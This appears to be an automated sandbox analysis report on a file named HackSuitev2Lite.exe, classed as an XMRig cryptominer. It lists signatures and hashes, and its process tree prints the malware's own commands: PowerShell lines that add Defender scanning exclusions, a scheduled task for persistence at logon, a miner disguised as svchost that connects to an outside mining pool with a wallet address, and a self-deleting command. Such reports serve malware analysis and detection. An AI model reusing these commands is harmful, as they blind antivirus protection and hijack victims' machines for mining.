Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-12-2024 00:30

General

  • Target

    HackSuitev2Lite.exe

  • Size

    124KB

  • MD5

    e6d4f94c1ed2989dd2ef52daf6ab9334

  • SHA1

    237d1643c44d8759036e61256d7cc7355c814915

  • SHA256

    e00004a583d1fe4816b9d0049f3bf3d5cdedd65e9ed50c5ee34f0bdfe0dac4d2

  • SHA512

    f7d7fbd9c8c2a357c7b119f9a5d541de8c1704923e1b20aacd4f5f79db8c9f554dfe606dfee5f1d6f5dd460a59e69d68632c08ea7917c5ad2881875cd46120b7

  • SSDEEP

    3072:4S3vH68fUJj4uuNqmE7eF9gPLE3pyzdeoqJL9F6R0gfLtiR/j8qNxb:4S3SJR3uNqR29hk2nO7AY

Score
10/10

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\HackSuitev2Lite.exe
    "C:\Users\Admin\AppData\Local\Temp\HackSuitev2Lite.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:528
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4128
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2876
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4460
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2668
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\HackSuitev2Lite.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4040
      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
        C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\HackSuitev2Lite.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4620
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:5052
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2100
        • C:\Windows\system32\services64.exe
          "C:\Windows\system32\services64.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4056
          • C:\Windows\system32\cmd.exe
            "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4984
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3692
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3192
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4788
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4560
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:876
            • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
              C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in System32 directory
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3564
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2504
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4872
              • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                PID:2232
              • C:\Windows\System32\svchost.exe
                C:\Windows/System32\svchost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.minexmr.com:4444 --user=86xZBBjbFV93RDaatn69Jn6r8ESRW8jfQRzUekYZYhipGdYMPrbKGAAc9mEaSYxuujSnkFjgUDDz6FCnZwm86D2dTKafUH1.APEXCSPDEBJWH --pass= --cpu-max-threads-hint=20 --cinit-idle-wait=15 --cinit-idle-cpu=100 --cinit-stealth
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4128
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2396
                • C:\Windows\system32\choice.exe
                  choice /C Y /N /D Y /T 3
                  8⤵
                    PID:3704
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2220
            • C:\Windows\system32\choice.exe
              choice /C Y /N /D Y /T 3
              5⤵
                PID:3292

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log

        Filesize

        646B

        MD5

        23867f73ff39fa0dfee6cfb5d3d176ab

        SHA1

        8705a09d38e5f0b034a6f4b4deb5817e312204e1

        SHA256

        f416e8f8135e0d7a3163860b44fe7ebc8ca0f42e783e870e6ec74e3b6da44f88

        SHA512

        108dc8ff63b1e222a8a6311af329e8f3376bc356b4946d958a68d8e3d4c54356a3a9851fd689b0a5d4f3f27b47ec03aa0672cee1fba3047079642db0b7603ea1

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        0093819c829dd30c13746f256efba97f

        SHA1

        f095cbb1d10a54a91d7d341c4098d44973d3ec50

        SHA256

        5f936c252c9ed7d08d4a73b86230d9877173b44c36544f0b24eae3eb38617401

        SHA512

        72aac852de41473494d2263aa44dbabfb1f318f8a21ebdfe080c4a98b9288db07e9641a935d9a640b5e879f28a0560cae53bd4191ac94d315b87746e57e69af2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        eb1ad317bd25b55b2bbdce8a28a74a94

        SHA1

        98a3978be4d10d62e7411946474579ee5bdc5ea6

        SHA256

        9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

        SHA512

        d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        77d622bb1a5b250869a3238b9bc1402b

        SHA1

        d47f4003c2554b9dfc4c16f22460b331886b191b

        SHA256

        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

        SHA512

        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        a7cc007980e419d553568a106210549a

        SHA1

        c03099706b75071f36c3962fcc60a22f197711e0

        SHA256

        a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165

        SHA512

        b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        c97a4182073c256a19c59d3f517f0c30

        SHA1

        016abc6b93b503f10d00a5ba6132af3fb7920897

        SHA256

        317e389daa355142d77a25bc3a722d895d2beba9b92dd2ccaa0fdcd87f4fd27d

        SHA512

        155003abc107f7aabe7489b173c3e5f2bd0d748672f14c09279c3b67cf902207cf0098bc4629c10ea45c346bedc090e7fcd8a1cd42958ab5aa89df7bc43102ba

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        2524e72b0573fa94e9cb8089728a4b47

        SHA1

        3d5c4dfd6e7632153e687ee866f8ecc70730a0f1

        SHA256

        fafde5bec1db5e838e0a43603714686f9911b7aaa8d8ff0fe40f9496a7b38747

        SHA512

        99a7593a82353f792a58ea99196330aaa8c34ac2f616f0be4b4ca4f76388485866ba96dc62d9b8e7627c1df6a1f74111342307ba82400adce5adac68b47a6fa8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        10890cda4b6eab618e926c4118ab0647

        SHA1

        1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

        SHA256

        00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

        SHA512

        a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2bhvrj4c.piq.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\svchost64.exe

        Filesize

        38KB

        MD5

        fdd26ba90d4f9c1ca7e58fdad3ba4f19

        SHA1

        e0425fcd3d99398ec29f1f243733b2c1b9a27af9

        SHA256

        73330ff39a9e2266d9b47cee5baf41da9833b81bfaa7f6173b0b8700df867662

        SHA512

        771ce349faba771d52279629fb1bc838a2342c88da27cec823f6f6a5f91013786d53d5ff2ad41c7ab422c293b93f00121e7ee78a4ffec568da5270a7cf40a0bc

      • C:\Windows\System32\Microsoft\Libs\sihost64.exe

        Filesize

        7KB

        MD5

        c75e4985f44b1aaf20a29101c7289884

        SHA1

        bd683b05939d453e953500c813557fbacc4472e8

        SHA256

        269073ab5efaba49aabbc6b9d79c693a08fb018f4e8cb538930c3594a7b16473

        SHA512

        bad68234138e17a8eda512b208e1aa2875ab0a4517a4b4895f46f26b4eb9af7304711400c290917d2fc39371769534396c20181e48cc70d8b87c12efea1e5dbb

      • C:\Windows\System32\services64.exe

        Filesize

        124KB

        MD5

        e6d4f94c1ed2989dd2ef52daf6ab9334

        SHA1

        237d1643c44d8759036e61256d7cc7355c814915

        SHA256

        e00004a583d1fe4816b9d0049f3bf3d5cdedd65e9ed50c5ee34f0bdfe0dac4d2

        SHA512

        f7d7fbd9c8c2a357c7b119f9a5d541de8c1704923e1b20aacd4f5f79db8c9f554dfe606dfee5f1d6f5dd460a59e69d68632c08ea7917c5ad2881875cd46120b7

      • memory/528-0-0x00007FFE3D2D3000-0x00007FFE3D2D5000-memory.dmp

        Filesize

        8KB

      • memory/528-7-0x00007FFE3D2D0000-0x00007FFE3DD91000-memory.dmp

        Filesize

        10.8MB

      • memory/528-1-0x0000000000270000-0x0000000000292000-memory.dmp

        Filesize

        136KB

      • memory/528-53-0x00007FFE3D2D3000-0x00007FFE3D2D5000-memory.dmp

        Filesize

        8KB

      • memory/528-54-0x00007FFE3D2D0000-0x00007FFE3DD91000-memory.dmp

        Filesize

        10.8MB

      • memory/528-57-0x00007FFE3D2D0000-0x00007FFE3DD91000-memory.dmp

        Filesize

        10.8MB

      • memory/2232-140-0x0000000000060000-0x0000000000066000-memory.dmp

        Filesize

        24KB

      • memory/4128-142-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

      • memory/4128-143-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

      • memory/4128-147-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

      • memory/4128-17-0x00007FFE3D2D0000-0x00007FFE3DD91000-memory.dmp

        Filesize

        10.8MB

      • memory/4128-149-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

      • memory/4128-14-0x00007FFE3D2D0000-0x00007FFE3DD91000-memory.dmp

        Filesize

        10.8MB

      • memory/4128-148-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

      • memory/4128-13-0x00007FFE3D2D0000-0x00007FFE3DD91000-memory.dmp

        Filesize

        10.8MB

      • memory/4128-18-0x00007FFE3D2D0000-0x00007FFE3DD91000-memory.dmp

        Filesize

        10.8MB

      • memory/4128-144-0x0000023294C70000-0x0000023294C90000-memory.dmp

        Filesize

        128KB

      • memory/4128-8-0x000001A8F1DA0000-0x000001A8F1DC2000-memory.dmp

        Filesize

        136KB

      • memory/4128-146-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

      • memory/4128-145-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

      • memory/4620-61-0x0000000000240000-0x000000000024E000-memory.dmp

        Filesize

        56KB

      • memory/4620-63-0x0000000002820000-0x000000000282A000-memory.dmp

        Filesize

        40KB

      • memory/4620-62-0x00000000027D0000-0x00000000027E2000-memory.dmp

        Filesize

        72KB